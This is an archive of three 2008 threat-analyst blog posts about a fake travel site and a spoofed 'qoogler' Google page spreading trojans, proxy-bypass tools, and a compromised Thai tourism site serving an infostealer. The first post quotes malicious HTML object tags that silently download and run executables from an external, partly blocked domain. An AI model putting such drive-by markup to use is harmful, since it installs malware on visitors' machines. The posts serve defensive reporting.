Archive for February 1st, 2008
February 1st, 2008 by Loucif Kharouni (Threats Analyst)
Yesterday we received reports of a malicious Web site that targets Italian users. This particular site purports to be a tour and travel operator for India:
The malicious source is similar to:
<object classid=”clsid:0F5FBC88-CC6A-48e8-B037-E37763D0482B” codebase=”http://www.{BLOCKED}elettronici.com/indiatouroperator/registrazione.exe“>
</object>
The file registrazione.exe is detected as TROJ_AGENT.AAFY, and the URL that it hosts is detected as HTML_AGENT.AAFX.
Once the file “Registrazione” is installed on a system, it automatically redirects to a horoscope Web site, which in fact has nothing to do with Travel Tour Operator:
Note that the file registrazione.exe (TROJ_AGENT.AAFY) downloads other malware components, such as TROJ_AGENT.ZTH.
After the download and installation are completed, the browser application indicates that an error occured during loading the “desired” Web site. The easiest and fastest way to continue when Internet Explorer (IE) browser crashes is to open a new browser — but upon doing so, the user will find that the IE start page points to a new Web site, www.qoogler.com, which poses as the legitimate Google Web site:
As anyone may wonder, this is not a typographical error from our part, but it is indeed “qoogler.com” which poses to be the Google search engine. Have a look closer at the page, and note that Google became “GOOOGLE”. It also has an “AstroGooogle” link, which sends you back to the first astrology Web site we mentioned above. This is another social engineering technique that this malware employs to fool users into downloading its components.
Here’s the HTML code for the malicous page:
</HEAD> <object classid=”CLSID:0D95404C-C067-4ecf-BB6D-AB6008717183″ codebase=”GobbaEvo.exe” width=”1″ height=”1″> </object><BODY text=#000000 vLink=#551a8b aLink=#ff0000 link=#0000cc bgColor=#ffffff>
<CENTER> <br> <IMG height=74 alt=Google src=”images/nav_logo.gif” mce_src=”images/nav_logo.gif” width=226><BR> <BR> <form name=”form1″ method=”post” action=”./index.asp”> <TABLE cellSpacing=0 cellPadding=4 border=0> <TBODY>
The file GobbaEvo.exe is also detected as TROJ_AGENT.AAFX. In the infection stage, when the user tries to search for “trendmicro” (for example) using Gooogle, he might get following result:
The search result page asks for installation of a new program to resolve yet another issue with Internet Explorer. The downloaded file is, of course, yet another malware that redirects the user to an adult page, but still under the guise of qoogler.com.
February 1st, 2008 by Henry Artuz (Threats Analyst)
A proxy server, by definition, is a network service that allows clients to make indirect network connections to other network services like the Internet, giving users the freedom of browsing the Web.
The use of certain Firewall/Web filtering applications by some corporations, organizations, universities or countries shows that each is willing to spend a lot of money on Internet censorship to block malicious Web sites or others that are not related or appropriate to its business needs (e.g. porn sites).
However, there exist software on the Web today that claim to be able to bypass firewall rules and Web filtering application policies. These tools, namely Freegate, GPass, GTunnel and UltraSurf, may seem attractive as they enable one configured browser to access Web sites like Facebook, MySpace, YouTube, etc. even if the said sites are currently being blocked by firewall or Web filters (for instance, in office workstations). However, as with any unendorsed software freely available over the Internet, using these tools open the affected network to possible attack.
Trend Micro recently detected one of these proxy surfing tools (UltraSurf) as HKTL_PROXSURF.A using spyware pattern file version TMAPTN 576.34. These tools only need a Firefox browser and a plugin proxy toolbar that enables a user to switch to a different proxy surfing tool.
The following are screenshots of the said utilities in action:
In any case, freedom of Web browsing should always be controlled by restriction and limitation within the organization’s internal policies to prevent threats that are always available on the World Wide Web.
February 1st, 2008 by Joseph Pacamarra (Threats Analyst)
Research Project Manager Ivan Macalintal discovered a few hours ago that a Thailand-based tourism and travel site appears to have been compromised to serve malware. This discovery follows closely on the heels of the Thai Royal Air Force site compromise just a week ago.
Looking at the season, summer holidays are coming up soon in Asia and Bangkok is a strong contender for being the most popular Asian tourist spot. Malware authors may therefore be counting on this to drive traffic to the hacked site.
Clicking the link on the landing page of the Udiya Tour of Northern Thailand Web site redirects the user’s browser to a certain URL, which also redirects to yet another URL that contains multiple browser exploits ultimately leading to the download of a file named UPDATE.EXE. The said file is a variant of the LDPINCH family, which is known for their information theft routines.
Upon analysis, it was found that several of the pages from the same site have been compromised, including the site’s contact, reservation and package details pages. Macalintal describes the said pages as “full of highly-obfuscated JavaScript badness, injected and scattered all over, just before and after the HTML, some META and TITLE tags.”
Trend Micro users with updated patches are protected from this threat. We already detect this malware as TSPY_LDPINCH.FE using pattern file number 4.974.05.
Thanks to Network Architect Paul Ferguson for contacting ThaiCERT about this site compromise.
